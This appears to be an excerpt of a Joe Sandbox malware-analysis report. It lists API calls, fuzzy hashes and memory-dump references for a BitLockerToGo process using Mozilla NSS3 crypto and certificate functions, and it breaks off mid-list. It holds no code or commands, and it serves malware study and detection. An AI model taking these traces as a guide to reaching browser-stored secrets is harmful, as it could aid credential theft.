                                                                                                                                                      • API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
                                                                                                                                                      • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                                                                                                                      • API String ID: 3905088656-1374795319
                                                                                                                                                      • Opcode ID: d2ab178578dababea7e95e596366af6a44132bcbb855581274fdb732cccf6d5c
                                                                                                                                                      • Instruction ID: e95a6b32e053c291b9fd6d64ad4f5acd6d053fbb4607c00d3cdfa0a934a3ecda
                                                                                                                                                      • Opcode Fuzzy Hash: d2ab178578dababea7e95e596366af6a44132bcbb855581274fdb732cccf6d5c
                                                                                                                                                      • Instruction Fuzzy Hash: 7BF0C8B5900214BBDF047BA1DC49CAB3E3DDF42668F048024FD0956602EA39E96596F2
                                                                                                                                                      APIs
                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000400), ref: 6C984DCB
                                                                                                                                                        • Part of subcall function 6C970FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C9187ED,00000800,6C90EF74,00000000), ref: 6C971000
                                                                                                                                                        • Part of subcall function 6C970FF0: PR_NewLock.NSS3(?,00000800,6C90EF74,00000000), ref: 6C971016
                                                                                                                                                        • Part of subcall function 6C970FF0: PL_InitArenaPool.NSS3(00000000,security,6C9187ED,00000008,?,00000800,6C90EF74,00000000), ref: 6C97102B
                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6C984DE1
                                                                                                                                                        • Part of subcall function 6C9710C0: TlsGetValue.KERNEL32(?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C9710F3
                                                                                                                                                        • Part of subcall function 6C9710C0: EnterCriticalSection.KERNEL32(?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C97110C
                                                                                                                                                        • Part of subcall function 6C9710C0: PL_ArenaAllocate.NSS3(?,?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C971141
                                                                                                                                                        • Part of subcall function 6C9710C0: PR_Unlock.NSS3(?,?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C971182
                                                                                                                                                        • Part of subcall function 6C9710C0: TlsGetValue.KERNEL32(?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C97119C
                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6C984DFF
                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C984E59
                                                                                                                                                        • Part of subcall function 6C96FAB0: free.MOZGLUE(?,-00000001,?,?,6C90F673,00000000,00000000), ref: 6C96FAC7
                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CA4300C,00000000), ref: 6C984EB8
                                                                                                                                                      • SECOID_FindOID_Util.NSS3(?), ref: 6C984EFF
                                                                                                                                                      • memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6C984F56
                                                                                                                                                      • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C98521A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1025791883-0
                                                                                                                                                      • Opcode ID: 6533aaaa486ba4f29960f485a5343c22f7f0573d9e0802d28b8a84deeefa045a
                                                                                                                                                      • Instruction ID: c3eaae462f5bdf1db8b357554d4bf8629cb2cb8564426b8c53762adfdee22e59
                                                                                                                                                      • Opcode Fuzzy Hash: 6533aaaa486ba4f29960f485a5343c22f7f0573d9e0802d28b8a84deeefa045a
                                                                                                                                                      • Instruction Fuzzy Hash: F7F1BD71E02209CFEB08CF54D8507AEB7B6BF44358F258529E816AB781E735E985CF90
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: free$moz_xmalloc
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3009372454-0
                                                                                                                                                      • Opcode ID: fe7d0be043b8a1511e1a521a0d05019b499d6127552232882d25dd88671e4b6a
                                                                                                                                                      • Instruction ID: 52e22d06cbbd973c127078d574c65d6effa1cb61dedfccbb41ea7d2f062ecf6d
                                                                                                                                                      • Opcode Fuzzy Hash: fe7d0be043b8a1511e1a521a0d05019b499d6127552232882d25dd88671e4b6a
                                                                                                                                                      • Instruction Fuzzy Hash: ABB10372A041158FDB189E7CCBD476D77B2AF42328F180638E836DBB96D73098419B91
                                                                                                                                                      APIs
                                                                                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(6C982C2A), ref: 6C980C81
                                                                                                                                                        • Part of subcall function 6C96BE30: SECOID_FindOID_Util.NSS3(6C92311B,00000000,?,6C92311B,?), ref: 6C96BE44
                                                                                                                                                        • Part of subcall function 6C958500: SECOID_GetAlgorithmTag_Util.NSS3(6C9595DC,00000000,00000000,00000000,?,6C9595DC,00000000,00000000,?,6C937F4A,00000000,?,00000000,00000000), ref: 6C958517
                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C980CC4
                                                                                                                                                        • Part of subcall function 6C96FAB0: free.MOZGLUE(?,-00000001,?,?,6C90F673,00000000,00000000), ref: 6C96FAC7
                                                                                                                                                      • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C980CD5
                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C980D1D
                                                                                                                                                      • PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C980D3B
                                                                                                                                                      • PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C980D7D
                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C980DB5
                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C980DC1
                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C980DF7
                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C980E05
                                                                                                                                                      • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C980E0F
                                                                                                                                                        • Part of subcall function 6C9595C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C937F4A,00000000,?,00000000,00000000), ref: 6C9595E0
                                                                                                                                                        • Part of subcall function 6C9595C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C937F4A,00000000,?,00000000,00000000), ref: 6C9595F5
                                                                                                                                                        • Part of subcall function 6C9595C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C959609
                                                                                                                                                        • Part of subcall function 6C9595C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C95961D
                                                                                                                                                        • Part of subcall function 6C9595C0: PK11_GetInternalSlot.NSS3 ref: 6C95970B
                                                                                                                                                        • Part of subcall function 6C9595C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C959756
                                                                                                                                                        • Part of subcall function 6C9595C0: PK11_GetIVLength.NSS3(?), ref: 6C959767
                                                                                                                                                        • Part of subcall function 6C9595C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C95977E
                                                                                                                                                        • Part of subcall function 6C9595C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C95978E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3136566230-0
                                                                                                                                                      • Opcode ID: 05f4047b09ff8ef946612f087f4b657f9baeed1c4acdb7cb07f3fe8c78e014a2
                                                                                                                                                      • Instruction ID: cac5e7144acfd402442ea28dff9342ed35bb8d72184459125560443ebdf213d0
                                                                                                                                                      • Opcode Fuzzy Hash: 05f4047b09ff8ef946612f087f4b657f9baeed1c4acdb7cb07f3fe8c78e014a2
                                                                                                                                                      • Instruction Fuzzy Hash: D341B1B1902356ABEB009F65DC41BAF7A78AF2130CF105524E9196BB41E735EA14CBE2
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1192971331-0
                                                                                                                                                      • Opcode ID: 598f1cc2a60b729ecef1714d454c1abb70fe872718df214a9954d84dabc10a96
                                                                                                                                                      • Instruction ID: 2a4c3f86920f3ca8d8cba2d7d77850e7f243ef5972e2c33f7ce6d28b3f51bf7c
                                                                                                                                                      • Opcode Fuzzy Hash: 598f1cc2a60b729ecef1714d454c1abb70fe872718df214a9954d84dabc10a96
                                                                                                                                                      • Instruction Fuzzy Hash: 21314CB19047048FDB51AF79D68C2AEBBF1BF85309F01493DE99587311EB709498CBA2
                                                                                                                                                      APIs
                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C8B2F3D
                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,?), ref: 6C8B2FB9
                                                                                                                                                      • memcpy.VCRUNTIME140(?,00000000,?), ref: 6C8B3005
                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6C8B30EE
                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C8B3131
                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C8B3178
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpy$memsetsqlite3_log
                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                      • API String ID: 984749767-598938438
                                                                                                                                                      • Opcode ID: 900e5dc1bbc8e040faf6e8e9f49066f4171c4b4059bebf6cf0a430915428326a
                                                                                                                                                      • Instruction ID: 784318e0b0b4eba3edc5f7b1cf3558d8063736147169563f25850bc48b835ae1
                                                                                                                                                      • Opcode Fuzzy Hash: 900e5dc1bbc8e040faf6e8e9f49066f4171c4b4059bebf6cf0a430915428326a
                                                                                                                                                      • Instruction Fuzzy Hash: 13B19470E052199FCB29CF9DC984AEEB7B1BF48304F148429E849B7B45D7749D85CBA0
                                                                                                                                                      APIs
                                                                                                                                                      • SECITEM_ArenaDupItem_Util.NSS3(?,6C917D8F,6C917D8F,?,?), ref: 6C916DC8
                                                                                                                                                        • Part of subcall function 6C96FDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C96FE08
                                                                                                                                                        • Part of subcall function 6C96FDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C96FE1D
                                                                                                                                                        • Part of subcall function 6C96FDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C96FE62
                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C917D8F,?,?), ref: 6C916DD5
                                                                                                                                                        • Part of subcall function 6C9710C0: TlsGetValue.KERNEL32(?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C9710F3
                                                                                                                                                        • Part of subcall function 6C9710C0: EnterCriticalSection.KERNEL32(?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C97110C
                                                                                                                                                        • Part of subcall function 6C9710C0: PL_ArenaAllocate.NSS3(?,?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C971141
                                                                                                                                                        • Part of subcall function 6C9710C0: PR_Unlock.NSS3(?,?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C971182
                                                                                                                                                        • Part of subcall function 6C9710C0: TlsGetValue.KERNEL32(?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C97119C
                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CA38FA0,00000000,?,?,?,?,6C917D8F,?,?), ref: 6C916DF7
                                                                                                                                                        • Part of subcall function 6C96B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CA418D0,?), ref: 6C96B095
                                                                                                                                                      • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C916E35
                                                                                                                                                        • Part of subcall function 6C96FDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C96FE29
                                                                                                                                                        • Part of subcall function 6C96FDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C96FE3D
                                                                                                                                                        • Part of subcall function 6C96FDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C96FE6F
                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C916E4C
                                                                                                                                                        • Part of subcall function 6C9710C0: PL_ArenaAllocate.NSS3(?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C97116E
                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CA38FE0,00000000), ref: 6C916E82
                                                                                                                                                        • Part of subcall function 6C916AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C91B21D,00000000,00000000,6C91B219,?,6C916BFB,00000000,?,00000000,00000000,?,?,?,6C91B21D), ref: 6C916B01
                                                                                                                                                        • Part of subcall function 6C916AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C916B8A
                                                                                                                                                      • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C916F1E
                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C916F35
                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CA38FE0,00000000), ref: 6C916F6B
                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000,6C917D8F,?,?), ref: 6C916FE1
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 587344769-0
                                                                                                                                                      • Opcode ID: 89911e971a83e6b3a46336248b2b683ec4aafcc773d4c863c0d23f7346fb45df
                                                                                                                                                      • Instruction ID: cefa9582fdfb79ea412f56ca255adf1a4c1b2ef9611e671c7f225ea7ff8aacc0
                                                                                                                                                      • Opcode Fuzzy Hash: 89911e971a83e6b3a46336248b2b683ec4aafcc773d4c863c0d23f7346fb45df
                                                                                                                                                      • Instruction Fuzzy Hash: C7718E71D1424A9FEB00CF15CD51BAABBA8FFA4348F154269E848D7B11F770E9A4CB90
                                                                                                                                                      APIs
                                                                                                                                                      • TlsGetValue.KERNEL32(?,6C93CDBB,?,6C93D079,00000000,00000001), ref: 6C95AE10
                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,6C93CDBB,?,6C93D079,00000000,00000001), ref: 6C95AE24
                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,6C93D079,00000000,00000001), ref: 6C95AE5A
                                                                                                                                                      • memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C93CDBB,?,6C93D079,00000000,00000001), ref: 6C95AE6F
                                                                                                                                                      • free.MOZGLUE(85145F8B,?,?,?,?,6C93CDBB,?,6C93D079,00000000,00000001), ref: 6C95AE7F
                                                                                                                                                      • TlsGetValue.KERNEL32(?,6C93CDBB,?,6C93D079,00000000,00000001), ref: 6C95AEB1
                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C93CDBB,?,6C93D079,00000000,00000001), ref: 6C95AEC9
                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C93CDBB,?,6C93D079,00000000,00000001), ref: 6C95AEF1
                                                                                                                                                      • free.MOZGLUE(6C93CDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6C93CDBB,?), ref: 6C95AF0B
                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C93CDBB,?,6C93D079,00000000,00000001), ref: 6C95AF30
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Unlock$CriticalEnterSectionValuefree$memset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 161582014-0
                                                                                                                                                      • Opcode ID: dc7fd72e185d95c47fabb83868b811d09190e51db6fb69bb6a04132f4aba6630
                                                                                                                                                      • Instruction ID: 4699977b83639f93d9fb6e6bcde0517a5143a4c72235f9488583f9cc4dbf3b1a
                                                                                                                                                      • Opcode Fuzzy Hash: dc7fd72e185d95c47fabb83868b811d09190e51db6fb69bb6a04132f4aba6630
                                                                                                                                                      • Instruction Fuzzy Hash: F051BFB1A00602AFDB05DF25D884A66B7B8FF19318F444664DC0997E11EB35E8B8CBE5
                                                                                                                                                      APIs
                                                                                                                                                      • TlsGetValue.KERNEL32(?,00000000,00000000,?,6C93AB7F,?,00000000,?), ref: 6C934CB4
                                                                                                                                                      • EnterCriticalSection.KERNEL32(0000001C,?,6C93AB7F,?,00000000,?), ref: 6C934CC8
                                                                                                                                                      • TlsGetValue.KERNEL32(?,6C93AB7F,?,00000000,?), ref: 6C934CE0
                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,6C93AB7F,?,00000000,?), ref: 6C934CF4
                                                                                                                                                      • PL_HashTableLookup.NSS3(?,?,?,6C93AB7F,?,00000000,?), ref: 6C934D03
                                                                                                                                                      • PR_Unlock.NSS3(?,00000000,?), ref: 6C934D10
                                                                                                                                                        • Part of subcall function 6C9BDD70: TlsGetValue.KERNEL32 ref: 6C9BDD8C
                                                                                                                                                        • Part of subcall function 6C9BDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C9BDDB4
                                                                                                                                                      • PR_Now.NSS3(?,00000000,?), ref: 6C934D26
                                                                                                                                                        • Part of subcall function 6C9D9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CA20A27), ref: 6C9D9DC6
                                                                                                                                                        • Part of subcall function 6C9D9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CA20A27), ref: 6C9D9DD1
                                                                                                                                                        • Part of subcall function 6C9D9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C9D9DED
                                                                                                                                                      • PR_Unlock.NSS3(?,?,00000000,?), ref: 6C934D98
                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C934DDA
                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C934E02
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4032354334-0
                                                                                                                                                      • Opcode ID: 7372963e0a98586a839d80cd84effa52dbbb63c947728711b41028172f913175
                                                                                                                                                      • Instruction ID: a9fbf668a7fdc7bac6c5bbabc2ad9117ce066c0013af967b548e04412f4fde8c
                                                                                                                                                      • Opcode Fuzzy Hash: 7372963e0a98586a839d80cd84effa52dbbb63c947728711b41028172f913175
                                                                                                                                                      • Instruction Fuzzy Hash: 4B41C9B6A00211ABDB01AF24EC40A667BB8FF2521DF065170EC1C87B15FB36E954CBE1
                                                                                                                                                      APIs
                                                                                                                                                      • SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C912CDA,?,00000000), ref: 6C912E1E
                                                                                                                                                        • Part of subcall function 6C96FD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C919003,?), ref: 6C96FD91
                                                                                                                                                        • Part of subcall function 6C96FD80: PORT_Alloc_Util.NSS3(A4686C97,?), ref: 6C96FDA2
                                                                                                                                                        • Part of subcall function 6C96FD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C97,?,?), ref: 6C96FDC4
                                                                                                                                                      • SECITEM_DupItem_Util.NSS3(?), ref: 6C912E33
                                                                                                                                                        • Part of subcall function 6C96FD80: free.MOZGLUE(00000000,?,?), ref: 6C96FDD1
                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C912E4E
                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C912E5E
                                                                                                                                                      • PL_HashTableLookup.NSS3(?), ref: 6C912E71
                                                                                                                                                      • PL_HashTableRemove.NSS3(?), ref: 6C912E84
                                                                                                                                                      • PL_HashTableAdd.NSS3(?,00000000), ref: 6C912E96
                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C912EA9
                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C912EB6
                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C912EC5
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
